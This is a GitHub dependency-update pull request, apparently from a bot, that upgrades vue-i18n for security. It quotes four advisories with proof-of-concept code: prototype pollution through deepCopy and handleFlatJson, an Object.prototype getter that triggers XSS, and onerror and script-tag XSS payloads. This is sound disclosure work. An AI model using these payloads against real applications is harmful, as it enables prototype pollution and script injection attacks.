Skip to content

chore(deps): update dependency vue-i18n to v9.14.5 [security]#1407

Open
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vue-i18n-vulnerability
Open

chore(deps): update dependency vue-i18n to v9.14.5 [security]#1407
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/npm-vue-i18n-vulnerability

Conversation

@renovate

@renovate renovate Bot commented Dec 2, 2024

Copy link
Copy Markdown
Contributor

This PR contains the following updates:

Package Change Age Confidence
vue-i18n (source) 9.9.19.14.5 age confidence

@​intlify/shared Prototype Pollution vulnerability

CVE-2024-52810 / GHSA-hjwq-mjwj-4x6c

More information

Details

Vulnerability type: Prototype Pollution

Affected Package:

Product: @​intlify/shared
Version: 10.0.4

Vulnerability Location(s):

node_modules/@​intlify/shared/dist/shared.cjs:232:26

Description:

The latest version of @intlify/shared (10.0.4) is vulnerable to Prototype Pollution through the entry function(s) lib.deepCopy. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/shared@10.0.4
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}
(async () => {
const lib = await import('@​intlify/shared');
var someObj = {}
console.log("Before Attack: ", JSON.stringify({}.__proto__));
try {
// for multiple functions, uncomment only one for each execution.
lib.deepCopy (JSON.parse('{"__proto__":{"pollutedKey":123}}'), someObj)
} catch (e) { }
console.log("After Attack: ", JSON.stringify({}.__proto__));
delete Object.prototype.pollutedKey;
})();

References

Prototype Pollution Leading to Remote Code Execution - An example of how prototype pollution can lead to command code injection.

OWASP Prototype Pollution Prevention Cheat Sheet - Best practices for preventing prototype pollution.

PortSwigger Guide on Preventing Prototype Pollution - A detailed guide to securing your applications against prototype pollution.

Severity

  • CVSS Score: 6.9 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vue-i18n has cross-site scripting vulnerability with prototype pollution

CVE-2024-52809 / GHSA-9r9m-ffp6-9x4v

More information

Details

Vulnerability type

XSS

Description

vue-i18n can be passed locale messages to createI18n or useI18n.
we can then translate them using t and $t.
vue-i18n has its own syntax for local messages, and uses a message compiler to generate AST.
In order to maximize the performance of the translation function, vue-i18n uses bundler plugins such as @intlify/unplugin-vue-i18n and bulder to convert the AST in advance when building the application.
By using that AST as the locale message, it is no longer necessary to compile, and it is possible to translate using the AST.

The AST generated by the message compiler has special properties for each node in the AST tree to maximize performance. In the PoC example below, it is a static property, but that is just one of the optimizations.
About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts

In general, the locale messages of vue-i18n are optimized during production builds using @intlify/unplugin-vue-i18n,
so there is always a property that is attached during optimization like this time.
But if you are using a locale message AST in development mode or your own, there is a possibility of XSS if a third party injects.

Reproduce (PoC)
<!doctype html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>vue-i18n XSS</title>
    <script src="https://unpkg.com/vue@3"></script>
    <script src="https://unpkg.com/vue-i18n@10"></script>
    <!-- Scripts that perform prototype contamination, such as being distributed from malicious hosting sites or injected through supply chain attacks, etc. -->
    <script>
      /**
       * Prototype pollution vulnerability with `Object.prototype`.
       * The 'static' property is part of the optimized AST generated by the vue-i18n message compiler.
       * About details of special properties, see https://github.com/intlify/vue-i18n/blob/master/packages/message-compiler/src/nodes.ts
       *
       * In general, the locale messages of vue-i18n are optimized during production builds using `@intlify/unplugin-vue-i18n`,
       * so there is always a property that is attached during optimization like this time.
       * But if you are using a locale message AST in development or your own, there is a possibility of XSS if a third party injects prototype pollution code.
       */
      Object.defineProperty(Object.prototype, 'static', {
        configurable: true,
        get() {
          alert('prototype polluted!')
          return 'prototype pollution'
        }
      })
    </script> 
 </head>
  <body>
    <div id="app">
      <p>{{ t('hello') }}</p>
    </div>
    <script>
      const { createApp } = Vue
      const { createI18n, useI18n } = VueI18n

      // AST style locale message, which build by `@intlify/unplugin-vue-i18n`
      const en = {
        hello: {
          type: 0,
          body: {
            items: [
              {
                type: 3,
                value: 'hello world!'
              }
            ]
          }
        }
      }

      const i18n = createI18n({
        legacy: false,
        locale: 'en',
        messages: {
          en
        }
      })

      const app = createApp({
        setup() {
          const { t } = useI18n()
          return { t }
        }
      })
      app.use(i18n)
      app.mount('#app')
    </script>
  </body>
</html>
Workarounds

Before v10.0.0, we can work around this vulnerability by using the regular compilation (jit: false of @intlify/unplugin-vue-i18n plugin configuration) way instead of jit compilation.

References

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Vue I18n Allows Prototype Pollution in handleFlatJson

CVE-2025-27597 / GHSA-p2ph-7g93-hw3m

More information

Details

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

##### v9.1
node_modules/@&#8203;intlify/message-resolver/index.js

##### v9.2 or later
node_modules/@&#8203;intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @&#8203;intlify/message-resolver@9.1.10
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}
// poc.js
(async () => {
    const lib = await import('@&#8203;intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

Severity

  • CVSS Score: 8.9 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes

CVE-2025-53892 / GHSA-x8qp-wqqm-57ph

More information

Details

Summary

The escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as <img src=x onerror=...>, if the interpolated value is inserted inside an HTML context using v-html.

This may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.

Details

When escapeParameterHtml: true is enabled, it correctly escapes common injection points.

However, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:

<img src=x onerror=alert(1)>

PoC

In your Vue I18n configuration:

const i18n = createI18n({
  escapeParameterHtml: true,
  messages: {
    en: {
      vulnerable: 'Caution: <img src=x onerror="{payload}">'
    }
  }
});

Use this interpolated payload:

const payload = '<script>alert("xss")</script>';
Render the translation using v-html (even not using v-html):

<p v-html="$t('vulnerable', { payload })"></p>
Expected: escaped content should render as text, not execute.

Actual: script executes in some environments (or the payload is partially parsed as HTML).

Impact

This creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .

Severity

  • CVSS Score: 5.3 / 10 (Medium)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

intlify/vue-i18n (vue-i18n)

v9.14.5

Compare Source

What's Changed

🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v9.14.4...v9.14.5

v9.14.4

Compare Source

What's Changed
🐛 Bug Fixes

Full Changelog: intlify/vue-i18n@v9.14.3...v9.14.4

v9.14.3

Compare Source

What's Changed
🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v9.14.2...v9.14.3

v9.14.2

Compare Source

What's Changed

🔒 Security Fixes

Full Changelog: intlify/vue-i18n@v9.14.1...v9.14.2

v9.14.1

Compare Source

What's Changed

🐛 Bug Fixes

Full Changelog: intlify/vue-i18n@v9.14.0...v9.14.1

v9.14.0

Compare Source

What's Changed

⚡ Improvement Features

Full Changelog: intlify/vue-i18n@v9.13.1...v9.14.0

v9.13.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

💥 Breaking Changes

Full Changelog: intlify/vue-i18n@v9.13.1...v10.0.0-alpha.1

v9.13.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

Full Changelog: intlify/vue-i18n@v9.13.0...v9.13.1

v9.12.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚠️ Deprecated Features
⚡ Improvement Features
📝️ Documentations

New Contributors

Full Changelog: intlify/vue-i18n@v9.12.1...v9.13.0

v9.12.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes
👕 Refactoring

Full Changelog: intlify/vue-i18n@v9.12.0...v9.12.1

v9.11.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

Full Changelog: intlify/vue-i18n@v9.11.1...v9.12.0

v9.11.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

Full Changelog: intlify/vue-i18n@v9.11.0...v9.11.1

v9.10.2

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🌟 Features

New Contributors

Full Changelog: intlify/vue-i18n@v9.10.2...v9.11.0

v9.10.1

Compare Source

This changelog is generated by GitHub Releases

What's Changed

🐛 Bug Fixes

New Contributors

Full Changelog: intlify/vue-i18n@v9.10.1...v9.10.2

v9.10.0

Compare Source

This changelog is generated by GitHub Releases

What's Changed

⚡ Improvement Features
📝️ Documentations

New Contributors

Full Changelog: intlify/vue-i18n@v9.10.0...v9.10.1


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@vercel

vercel Bot commented Dec 2, 2024

Copy link
Copy Markdown

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name Status Preview Updated (UTC)
it-tools ✅ Ready (Inspect) Visit Preview Jul 2, 2025 7:04pm

@renovate renovate Bot changed the title fix(deps): update dependency vue-i18n to v9.14.2 [security] fix(deps): update dependency vue-i18n to v9.14.2 [security] - autoclosed Dec 8, 2024
@renovate renovate Bot closed this Dec 8, 2024
@renovate renovate Bot deleted the renovate/npm-vue-i18n-vulnerability branch December 8, 2024 18:31
@renovate renovate Bot changed the title fix(deps): update dependency vue-i18n to v9.14.2 [security] - autoclosed fix(deps): update dependency vue-i18n to v9.14.2 [security] Dec 8, 2024
@renovate renovate Bot reopened this Dec 8, 2024
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 2 times, most recently from 6a82d84 to 5de978b Compare December 14, 2024 11:16
@sonarqubecloud

Copy link
Copy Markdown

@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 5de978b to 37f8a8e Compare January 23, 2025 17:59
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 37f8a8e to 2dcb0d5 Compare January 30, 2025 14:28
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 2dcb0d5 to 2d47055 Compare February 9, 2025 13:26
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 2d47055 to 2012642 Compare March 3, 2025 12:28
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 2012642 to 0f7dd0c Compare March 7, 2025 19:39
@renovate renovate Bot changed the title fix(deps): update dependency vue-i18n to v9.14.2 [security] fix(deps): update dependency vue-i18n to v9.14.3 [security] Mar 7, 2025
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 0f7dd0c to 98bccff Compare March 11, 2025 12:42
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 98bccff to bbc015d Compare March 13, 2025 19:34
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from bbc015d to 189f445 Compare March 17, 2025 18:35
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 189f445 to e04745b Compare April 1, 2025 11:15
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 2 times, most recently from 3965e33 to e980a87 Compare August 13, 2025 16:04
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from e980a87 to 931bf1a Compare August 19, 2025 13:40
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 931bf1a to 486acce Compare August 31, 2025 14:03
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 486acce to 14fa340 Compare September 25, 2025 20:32
@renovate renovate Bot changed the title fix(deps): update dependency vue-i18n to v9.14.5 [security] chore(deps): update dependency vue-i18n to v9.14.5 [security] Sep 25, 2025
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 14fa340 to ceaa42a Compare October 22, 2025 01:12
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from ceaa42a to c911f50 Compare November 11, 2025 01:17
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from c911f50 to 86da8af Compare November 18, 2025 14:01
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 86da8af to e7b0fc2 Compare December 3, 2025 19:54
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from e7b0fc2 to cd085b9 Compare December 31, 2025 16:49
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from cd085b9 to 76ece9a Compare January 8, 2026 17:07
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 2 times, most recently from 826a017 to 9946400 Compare January 23, 2026 17:36
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 9946400 to 1ee227c Compare February 2, 2026 18:57
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 2 times, most recently from 694f62e to 5042332 Compare February 17, 2026 21:57
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 5042332 to 13ba0f5 Compare March 5, 2026 14:02
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch from 13ba0f5 to 974bbed Compare March 13, 2026 16:16
@renovate renovate Bot changed the title chore(deps): update dependency vue-i18n to v9.14.5 [security] chore(deps): update dependency vue-i18n to v9.14.5 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot changed the title chore(deps): update dependency vue-i18n to v9.14.5 [security] - autoclosed chore(deps): update dependency vue-i18n to v9.14.5 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/npm-vue-i18n-vulnerability branch 3 times, most recently from 2630c21 to cac9516 Compare April 1, 2026 19:58
@sonarqubecloud

Copy link
Copy Markdown

@sonarqubecloud

sonarqubecloud Bot commented Jun 1, 2026

Copy link
Copy Markdown

@sonarqubecloud

Copy link
Copy Markdown

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants